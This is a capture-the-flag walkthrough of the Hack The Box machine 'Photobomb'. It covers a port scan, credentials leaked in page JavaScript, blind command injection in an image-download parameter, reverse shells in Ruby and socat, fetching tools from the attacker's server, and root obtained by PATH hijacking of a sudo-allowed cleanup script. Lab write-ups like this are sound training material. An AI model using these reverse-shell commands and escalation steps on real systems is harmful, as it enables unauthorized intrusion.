Hackthebox - Photobomb


└─$ sudo nmap -T4 -sC -sV -O -Pn -p-                   
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-24 09:06 EST
Nmap scan report for
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.92 seconds
  • We need to add a line to our /etc/hosts/ file like this photobomb.htb

Port 80

  • Clicking on the link will open a prompt to login

  • Looking at the code we find this

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
window.onload = init;
  • Great we have credentials pH0t0:b0Mb! using these we are able to login


  • Nothing here. Most endpoints give this 404 page.

  • Here is the code of the page

  <img src=''>
  <div id="c">
    Try this:
    <pre>get &#x27;&#x2F;printers&#x27; do
  &quot;Hello World&quot;
  • We can note here the presence of Sinatra, and keep it aside for later.

  • Let's play a little with the download feature

  • Photobomb kinda reminds me about zipbomb (the attack) but we do not have an upload form at the moment.

  • It seems like we should focus on injection or path traversal vulnerabilities.

  • Let's use burp intruder for some fuzzing. Looking at the results, we get some interesting backtrace.

  • Trying out a wget in the filtype parameter in a server on my kali does something. Doing a whoami however won't work because we do not get the output as it is blind command injection.

  • We start a local webserver python3 -m http.server 80

  • Using this we could launch a reverse shell

  • Our usual bash commands are not successful.

  • This one in ruby looses the connection right away ruby -rsocket -e'f=TCPSocket.open("",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

  • We are the user wizard. Let's grab the user flag

Privilege escalation

  • Let's get a better shell with a socat binary

  • wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O socat from your kali

  • Then we put on our python web server python3 -m http.server 80

  • We also set up a listener with socat

socat file:`tty`,raw,echo=0 tcp-listen:4445

Then we go to a writable directory wget

  • chmod +x socat

  • ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:`


  • We take linpeas and launch it

  • Interesting input to investigate further

*/5 * * * * sudo /opt/cleanup.sh
  • There is an interesting cronjob.

  • Here is the content of /opt/cleanup.sh

. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
  • Also we can set the env for /opt/cleanup.sh and run it without the root password. See sudo -l result here

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
  • The cleanup script uses the find command. We could make our own find command and change the path.

INSIDER TIP: Don't do like me do not forget to chmod +x your malicious find script... -_-'

  • So here is the process

    • Create your own malicious find command. Here is mine (it will lauch root shell but you could also make a reverse shell for example)

    • Get it in your target (you can also write your script from the target with echo) wget

    • Make your script executable chmod +x find

    • Set the path sudo PATH=/home/wizard/photobomb:$PATH /opt/cleanup.sh this way the find command will be fetch where you want here in the photobomb folder

    • You should be root in a very few seconds

We can grab the root flag

Last updated